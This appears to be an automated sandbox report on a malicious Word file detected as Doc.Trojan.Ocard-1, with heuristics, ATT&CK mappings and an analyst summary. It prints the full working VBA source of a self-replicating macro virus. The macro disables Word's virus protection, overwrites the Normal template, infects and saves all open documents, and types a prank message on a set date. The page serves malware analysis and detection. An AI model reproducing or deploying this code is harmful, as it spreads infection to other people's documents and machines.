MALICIOUS
140
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1547.001 Registry Run Keys / Startup Folder
The sample is a malicious Office document containing VBA macros. The macros are designed to modify the Normal.dot template, which is a common technique for establishing persistence or downloading further stages. The ClamAV detection 'Doc.Trojan.Ocard-1' further supports its malicious nature. The specific intent of the macro is to copy its own code into the Normal.dot template, potentially to ensure execution on subsequent document openings.
Heuristics 2
-
ClamAV: Doc.Trojan.Ocard-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Ocard-1
-
VBA macros detected medium OLE_VBA_MACROSDocument contains VBA macro code
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8556 bytes |
SHA-256: 7afdf360ac4a2562430df6ea6dd1f2b21b8e902ff08c82bf280137780f5b3fd1 |
|||
|
Detection
ClamAV:
Doc.Trojan.Ocard-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Close()
'Draco Malfoy
Dim a As Document, t As Template
Dim beak As Double, str As String
Dim i, salmon As Integer
On Error Resume Next
Set a = ActiveDocument
Set t = NormalTemplate
'Coups -39
Options.VirusProtection = False
Options.SaveNormalPrompt = False
Options.ConfirmConversions = False
If Left(a.VBProject.VBComponents.Item(1).CodeModule.Lines(2, 1), 6) = "'Draco" Then
salmon = vbOK
End If
If Left(t.VBProject.VBComponents.Item(1).CodeModule.Lines(2, 1), 6) = "'Draco" Then
salmon = salmon + vbCritical
End If
Select Case salmon
Case vbOK
str = a.VBProject.VBComponents.Item(1).CodeModule.Lines(1, a.VBProject.VBComponents.Item(1).CodeModule.CountOfLines)
With t.VBProject.VBComponents.Item(1).CodeModule
.DeleteLines 1, .CountOfLines
.AddFromString str
beak = Val(Mid(.Lines(9, 1), 7, Len(.Lines(9, 1)))) + 1
.ReplaceLine 9, "'Coups " & beak
If beak Mod 2 Then
.ReplaceLine 1, Left(.Lines(1, 1), 21) & "Close()"
Else
.ReplaceLine 1, Left(.Lines(1, 1), 21) & "Open()"
End If
End With
Case vbCritical
str = t.VBProject.VBComponents.Item(1).CodeModule.Lines(1, t.VBProject.VBComponents.Item(1).CodeModule.CountOfLines)
With a.VBProject.VBComponents.Item(1).CodeModule
.DeleteLines 1, .CountOfLines
.AddFromString str
End With
Case vbByte
str = a.VBProject.VBComponents.Item(1).CodeModule.Lines(1, a.VBProject.VBComponents.Item(1).CodeModule.CountOfLines)
For i = 1 To Word.Windows.Count
With Word.Windows.Item(i).Document.VBProject.VBComponents.Item(1).CodeModule
If Left(.Lines(2, 1), 6) <> "'Draco" Then
.DeleteLines 1, .CountOfLines
.AddFromString str
End If
End With
Word.Windows.Item(i).Document.Save
Next i
End Select
If Month(Now) = 5 And Day(Now) = 5 Then
If Right(a.VBProject.VBComponents.Item(1).CodeModule.Lines(1, 1), 7) = "Close()" Then
Selection.TypeText "Is it not a Camel ? "
a.Save
End If
End If
End Sub
' Processing file: /opt/analyzer/scan_staging/4ccff53e553e4422bbbb6f8b3cc28e39.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 4154 bytes
' Line #0:
' FuncDefn (Private Sub Document_Close())
' Line #1:
' QuoteRem 0x0000 0x000C "Draco Malfoy"
' Line #2:
' Dim
' VarDefn a (As Document)
' VarDefn t (As Template)
' Line #3:
' Dim
' VarDefn beak (As Double)
' VarDefn str (As String)
' Line #4:
' Dim
' VarDefn i
' VarDefn salmon (As Integer)
' Line #5:
' OnError (Resume Next)
' Line #6:
' SetStmt
' Ld ActiveDocument
' Set a
' Line #7:
' SetStmt
' Ld NormalTemplate
' Set t
' Line #8:
' QuoteRem 0x0000 0x0009 "Coups -39"
' Line #9:
' LitVarSpecial (False)
' Ld Options
' MemSt VirusProtection
' Line #10:
' LitVarSpecial (False)
' Ld Options
' MemSt SaveNormalPrompt
' Line #11:
' LitVarSpecial (False)
' Ld Options
' MemSt ConfirmConversions
' Line #12:
' LitDI2 0x0002
' LitDI2 0x0001
' LitDI2 0x0001
' Ld a
' MemLd VBProject
' MemLd VBComponents
' ArgsMemLd Item 0x0001
' MemLd CodeModule
' ArgsMemLd Lines 0x0002
' LitDI2 0x0006
' ArgsLd LBound 0x0002
' LitStr 0x0006 "'Draco"
' Eq
' IfBlock
' Line #13:
' Ld vbOK
' St salmon
' Line #14:
' EndIfBlock
' Line #15:
' LitDI2 0x0002
' LitDI2 0x0001
' LitDI2 0x0001
' Ld t
' MemLd VBProject
' MemLd VBComponents
' ArgsMemLd Item 0x0001
' MemLd CodeModule
' ArgsMemLd Lines 0x0002
' LitDI2 0x0006
' ArgsLd LBound 0x0002
' LitStr 0x0006 "'Draco"
' Eq
' IfBlock
' Line #16:
' Ld salmon
' Ld vbCritical
' Add
' St salmon
' Line #17:
' E
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.